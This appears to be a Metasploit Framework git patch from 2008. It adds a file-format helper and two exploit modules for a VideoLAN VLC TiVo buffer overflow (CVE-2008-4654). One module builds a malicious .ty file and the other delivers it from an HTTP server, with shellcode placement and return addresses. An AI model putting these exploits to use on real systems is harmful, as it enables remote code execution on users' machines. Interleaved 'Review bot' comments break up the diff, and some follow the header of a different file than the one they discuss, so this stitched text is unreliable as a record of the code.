From e1e1f5d6a413c16a6569b26ce6ec220960ac7d86 Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Wed, 3 Dec 2008 01:23:27 +0000
Subject: [PATCH] added fileformat mixin, fileformat exploit videolan_tivo.rb, and network based exploit videolan_tivo.rb

git-svn-id: file:///home/svn/framework3/trunk@5993 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit.rb | 3 +
 lib/msf/core/exploit/fileformat.rb | 31 +++++++
 .../windows/fileformat/videolan_tivo.rb | 87 ++++++++++++++++++
 .../exploits/windows/misc/videolan_tivo.rb | 91 +++++++++++++++++++
 4 files changed, 212 insertions(+)
 create mode 100644 lib/msf/core/exploit/fileformat.rb
 create mode 100644 modules/exploits/windows/fileformat/videolan_tivo.rb
 create mode 100644 modules/exploits/windows/misc/videolan_tivo.rb

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 10eea3a147..a63c0d2c08 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -242,6 +242,9 @@ class Exploit < Msf::Module
 # Networks
 require 'msf/core/exploit/lorcon'
 require 'msf/core/exploit/capture'
+
+ # FileFormat
+ require 'msf/core/exploit/fileformat'
 
 #
 # Returns an array of all of the exploit mixins. Lame algorithm right now.
diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb
new file mode 100644
index 0000000000..dda43b2560
--- /dev/null
+++ b/lib/msf/core/exploit/fileformat.rb
@@ -0,0 +1,31 @@
+###
+#
+# This module exposes a simple method to create a file.
+#
+###
+
+module Msf
+
+module Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'MSF']),
+ OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
+ ], Msf::Exploit::FILEFORMAT
+ )
+
+ def file_create(data)
+ fd = File.new("#{datastore['OUTPUTPATH']}/#{datastore['FILENAME']}","wb")
+ fd.puts data
+ fd.close
+ print_status("File '#{datastore['FILENAME']}' is located in '#{datastore['OUTPUTPATH']}' ...")
+ end
+
+ end
+
+end
+end
diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb
new file mode 100644
index 0000000000..2d3dc51548
--- /dev/null
+++ b/modules/exploits/windows/fileformat/videolan_tivo.rb
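Review bot: `file_create` is defined inside the body of `initialize` — the first `end` after `print_status` closes `file_create` and the next one closes `initialize` — so the method only comes into existence once an instance has run `initialize` and is re-defined on every instantiation; move `def file_create` out to the module body beside `initialize`. The handle opened with `File.new` is also never closed if `fd.puts` raises, and `puts` appends a newline to `data` although the header comment describes the helper as simply creating a file from what it is given; `File.open("#{datastore['OUTPUTPATH']}/#{datastore['FILENAME']}", "wb") { |fd| fd.write(data) }` closes on every path and writes the data unchanged. Joining the two datastore values with `File.join` instead of string interpolation would also avoid a doubled separator when `OUTPUTPATH` already ends in `/`, as its default does.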
@@ -0,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VideoLAN VLC TiVo Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
+ By creating a malicious TY file, a remote attacker could overflow a
+ buffer and execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => 'MC',
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'CVE', '2008-4654' ],
+ [ 'BID', '31813' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 550,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'VideoLAN VLC 0.9.4 (XP SP3 English)', { 'Ret' => 0x6a575cad } ],
+ [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 22 2008',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.ty']),
+ OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
+ ], self.class)
+
+ end
+
+ def exploit
+
+ ty = "\xF5\x46\x7A\xBD"
+ ty << "\x00\x00\x00\x02"
+ ty << "\x00\x02\x00\x00"
+ ty << "\x00" * 8
+ ty << "\x00\x00\x05\x41"
+ ty << "\x00" * 4
+ ty << "\x00\x00\x05\x49"
+ ty << "\x00" * 60
+ ty << [target.ret].pack('V') + payload.encoded + make_nops(12)
+ ty << "\x00" * (130980 - 4 - payload.encoded.length - 12)
+ ty << "\x05"
+ ty << "\x00" * 3
+ ty << "\x05"
+ ty << "\x00" * 1
+ ty << "\x09"
+ ty << "\xc0"
+ ty << "\x00" * 14
+ ty << "\x06"
+ ty << "\xe0"
+ ty << "\x00" * 302004
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(ty)
+
+ end
+
+end
diff --git a/modules/exploits/windows/misc/videolan_tivo.rb b/modules/exploits/windows/misc/videolan_tivo.rb
new file mode 100644
index 0000000000..de0492e309
--- /dev/null
+++ b/modules/exploits/windows/misc/videolan_tivo.rb
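Review bot: The `register_options` call after `super` re-registers `FILENAME` and `OUTPUTPATH`, which `Msf::Exploit::FILEFORMAT#initialize` (included just above) already registers with the same descriptions; only the `FILENAME` default differs (`'msf.ty'` here versus the mixin's `'MSF'`), so the second registration replaces the first and the mixin's defaults are dead. Either register only `OptString.new('FILENAME', [ false, 'The file name.', 'msf.ty'])` here, or let the mixin take the default filename from `info` so that modules including it do not have to repeat the whole block. The module header comment could also say that this is the file-format variant of `modules/exploits/windows/misc/videolan_tivo.rb` in the same commit, since the two share a `Name` and differ only in delivery.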
@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VideoLAN VLC TiVo Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
+ By creating a malicious TY file, a remote attacker could overflow a
+ buffer and execute arbitrary code.
+ },
+ 'License' => 'MSF_LICENSE',
+ 'Author' => [ 'MC' ],
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2008-4654' ],
+ [ 'BID', '31813' ],
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 550,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'VideoLAN VLC 0.9.4', { 'Ret' => 0x6a5e6710 } ],
+ [ 'VideoLAN VLC 0.9.2', { 'Ret' => 0x6a5e69d7 } ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 22 2008',
+ 'DefaultTarget' => 0))
+
+ end
+
+ def autofilter
+ false
+ end
+
+ def check_dependencies
+ use_zlib
+ end
+
+ def on_request_uri(cli, request)
+
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ ty = "\xF5\x46\x7A\xBD"
+ ty << "\x00\x00\x00\x02"
+ ty << "\x00\x02\x00\x00"
+ ty << "\x00\x00\x00\x00"
+ ty << "\x00\x00\x00\x00"
+ ty << "\x00\x00\x05\x41"
+ ty << "\x00\x00\x00\x00"
+ ty << "\x00\x00\x05\x49"
+ ty << "\x00" * 60
+ ty << "\x00" * (1024 - payload.encoded.length) + payload.encoded
+ ty << make_nops(2) + Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')
+ ty << make_nops(12) + [0xe8, -525].pack('CV') + "\x00" * (129931)
+ ty << "\x05"
+ ty << "\x00\x00\x00"
+ ty << "\x05"
+ ty << "\x00"
+ ty << "\x09"
+ ty << "\xc0"
+ ty << "\x00" * 14
+ ty << "\x06"
+ ty << "\xe0"
+ ty << "\x00" * 302004
+
+ print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+ send_response_html(cli, ty, { 'Content-Type' => 'application/octet-stream' })
+
+ handler(cli)
+
+ end
+
+end
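Review bot: `'License' => 'MSF_LICENSE'` passes a string literal where the sibling module added in the same commit (`modules/exploits/windows/fileformat/videolan_tivo.rb`) uses the `MSF_LICENSE` constant, so this module's license field would read literally "MSF_LICENSE"; change it to `'License' => MSF_LICENSE,`. In `on_request_uri`, the local `p` assigned from `regenerate_payload(cli)` is never read — the body builds from `payload.encoded`; if the regenerated payload is the one intended, `p.encoded` should be used there, otherwise the assignment can go: `return if regenerate_payload(cli).nil?`. The `request` parameter is likewise unused, which is presumably the callback's fixed signature; naming it `_request` would make that intent visible.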